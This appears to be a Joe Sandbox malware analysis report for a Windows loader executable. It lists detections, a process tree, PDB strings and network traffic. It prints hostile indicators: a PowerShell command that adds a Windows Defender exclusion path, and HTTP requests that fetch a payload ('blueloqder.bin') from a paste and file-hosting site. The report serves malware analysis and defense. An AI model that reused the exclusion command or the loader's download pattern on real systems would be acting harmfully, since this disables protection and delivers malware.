Edit tour

Windows Analysis Report
9K25QyJ4hA.exe

Overview

General Information

Sample name:	9K25QyJ4hA.exe renamed because original name is a hash value
Original sample name:	b5858b684b93cec0c56768fda67e721595bdfa7d14dbf45b74abbf686c9b66a2.exe
Analysis ID:	1356250
MD5:	7e658759b69b246757803baf9f776a60
SHA1:	6e1304c6539500ba0100327ac64858c25639387c
SHA256:	b5858b684b93cec0c56768fda67e721595bdfa7d14dbf45b74abbf686c9b66a2
Tags:	exe
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Adds a directory exclusion to Windows Defender

Machine Learning detection for sample

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

9K25QyJ4hA.exe (PID: 7384 cmdline: C:\Users\user\Desktop\9K25QyJ4hA.exe MD5: 7E658759B69B246757803BAF9F776A60)

powershell.exe (PID: 7416 cmdline: powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 7820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7384 -s 1604 MD5: C31336C1EFC2CCB44B4326EA793040F2)

9K25QyJ4hA.exe (PID: 7944 cmdline: "C:\Users\user\Desktop\9K25QyJ4hA.exe" MD5: 7E658759B69B246757803BAF9F776A60)

powershell.exe (PID: 7984 cmdline: powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 7208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7944 -s 2428 MD5: C31336C1EFC2CCB44B4326EA793040F2)

9K25QyJ4hA.exe (PID: 5440 cmdline: "C:\Users\user\Desktop\9K25QyJ4hA.exe" MD5: 7E658759B69B246757803BAF9F776A60)

powershell.exe (PID: 332 cmdline: powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 4132 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 2396 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 9K25QyJ4hA.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for submitted file

Source: 9K25QyJ4hA.exe	ReversingLabs: Detection: 29%
Source: 9K25QyJ4hA.exe	Virustotal: Detection: 37%			Perma Link

Machine Learning detection for sample

Source: 9K25QyJ4hA.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 104.21.70.240:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.70.240:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.70.240:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.8:49714 version: TLS 1.2

Source: 9K25QyJ4hA.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1847723391.0000000006A6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.0000000002578000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.000000000318C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Net.Http.pdba source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb9 source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdbL0Fw# source: WER8D8.tmp.dmp.23.dr
Source:	Binary string: loadermode32bit get from pastein.pdbD` source: WER6EBB.tmp.dmp.7.dr
Source:	Binary string: Ssymbols\dll\mscorlib.pdbLb source: 9K25QyJ4hA.exe, 00000000.00000002.1461949710.0000000000539000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: loadermode32bit get from pastein.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb P:P ,P_CorExeMainmscoree.dll source: 9K25QyJ4hA.exe
Source:	Binary string: b77a5c561934e089.pdb source: 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: System.Core.ni.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: mscorlib.pdb.dll source: 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.000000000086B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe
Source:	Binary string: tem.pdbO source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1847723391.0000000006A6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb9- source: 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.0000000001268000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb\| source: WER6EBB.tmp.dmp.7.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb9 source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbY source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?HoC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000009.00000002.1534707118.00000000009B9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841103930.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1461949710.0000000000539000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841103930.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: HP<o0C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1461949710.0000000000539000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534707118.00000000009B9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841103930.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: System.ni.pdbRSDS source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: \??\C:\Windows\exe\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1466547531.0000000005F40000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbTe source: 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbT source: 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ein.pdb P:Pk source: 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.0000000001268000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb4 source: WER6EBB.tmp.dmp.7.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000803000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Net.Http.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: System.Configuration.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: ?HoC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: 9K25QyJ4hA.exe, 00000000.00000002.1461949710.0000000000539000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\loadermode32bit get from pastein.pdb_^H source: 9K25QyJ4hA.exe, 00000000.00000002.1466547531.0000000005F40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbm source: 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: System.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.0000000002578000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.000000000318C000.00000004.00000800.00020000.00000000.sdmp, WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: tem.pdb source: 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 00000000000000000400000000000000A.PDBso source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1461949710.0000000000539000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534707118.00000000009B9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841103930.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.0000000002578000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000000.00000002.1461949710.0000000000539000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534707118.00000000009B9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.000000000318C000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1847723391.0000000006A6E000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841103930.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb P source: 9K25QyJ4hA.exe, 00000000.00000000.1369866881.0000000000192000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: ein.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1466547531.0000000005F40000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.0000000001268000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Net.Http.ni.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb3}z source: 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: symbols\dll\mscorlib.pdbLb source: 9K25QyJ4hA.exe, 00000009.00000002.1534707118.00000000009B9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841103930.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: @Ho.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1461949710.0000000000539000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534707118.00000000009B9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841103930.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: 00000000000000000400000000000000A.PDB source: 9K25QyJ4hA.exe, 0000000F.00000002.1847723391.0000000006A6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbp source: 9K25QyJ4hA.exe, 00000009.00000002.1534707118.00000000009B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr

Source: global traffic	HTTP traffic detected: GET /raw/015dbe46ef97 HTTP/1.1Host: paste.foConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tqJAc/blueloqder.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/015dbe46ef97 HTTP/1.1Host: paste.foConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tqJAc/blueloqder.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/015dbe46ef97 HTTP/1.1Host: paste.foConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tqJAc/blueloqder.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 5.253.86.15 5.253.86.15

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /raw/015dbe46ef97 HTTP/1.1Host: paste.foConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tqJAc/blueloqder.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/015dbe46ef97 HTTP/1.1Host: paste.foConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tqJAc/blueloqder.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/015dbe46ef97 HTTP/1.1Host: paste.foConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tqJAc/blueloqder.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: paste.fo

Source: powershell.exe, 00000010.00000002.1598807950.00000000080D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000002.00000002.1395903363.0000000007044000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000010.00000002.1598807950.00000000080D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftz;
Source: powershell.exe, 00000002.00000002.1393730766.000000000542B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1498004369.0000000006079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1588412225.0000000005639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.000000000251F000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.000000000312E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://oshi.at
Source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.000000000251F000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.000000000312E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://oshi.atd
Source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.00000000030E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://paste.fo
Source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.00000000030E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://paste.fod
Source: powershell.exe, 00000010.00000002.1570273733.0000000004721000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1390973844.0000000004515000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1487824101.0000000005162000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1570273733.0000000004721000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.00000000024C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1390973844.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1487824101.0000000005011000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1570273733.00000000045D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1390973844.0000000004515000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1487824101.0000000005162000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1570273733.0000000004721000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000010.00000002.1570273733.0000000004721000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1390973844.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1487824101.0000000005011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1570273733.00000000045D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000010.00000002.1588412225.0000000005639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.1588412225.0000000005639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.1588412225.0000000005639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000010.00000002.1570273733.0000000004721000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.0000000002578000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000000.00000002.1463895036.00000000024F6000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.0000000003106000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.0000000003187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/somenonymous/OshiUpload
Source: powershell.exe, 00000002.00000002.1393730766.000000000542B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1498004369.0000000006079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1588412225.0000000005639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.00000000024FE000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oshi.at
Source: 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oshi.at/tqJAc/blueloqder.bin
Source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.0000000002451000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.00000000030D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.fo
Source: 9K25QyJ4hA.exe	String found in binary or memory: https://paste.fo/raw/015dbe46ef97
Source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.0000000002451000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.0000000003099000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.fo/raw/015dbe46ef97T

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
